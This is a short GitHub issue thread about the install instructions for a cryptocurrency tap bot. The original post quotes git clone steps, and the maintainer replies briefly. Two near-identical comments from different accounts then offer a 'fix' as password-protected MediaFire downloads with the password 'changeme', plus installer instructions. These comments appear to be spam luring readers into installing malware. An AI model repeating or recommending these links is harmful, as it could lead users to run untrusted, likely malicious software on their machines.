### ISSUE TITLE
fix your install guide

### ISSUE THREAD

**Issue by supmyhava** [vanhbakaa/Cexio-Tap-bot#4]
Installation
You can download the [repository](https://github.com/AlexKrutoy/CEX.IO-bot) by cloning it to your system and installing the necessary dependencies:

git clone https://github.com/AlexKrutoy/CEX.IO-bot.git
cd CEX.IO-bot

**Comment by vanhbakaa** [comment]
okay :v

**Comment by ESMELSTEPHANE24** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by Satyam1Deepu** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."
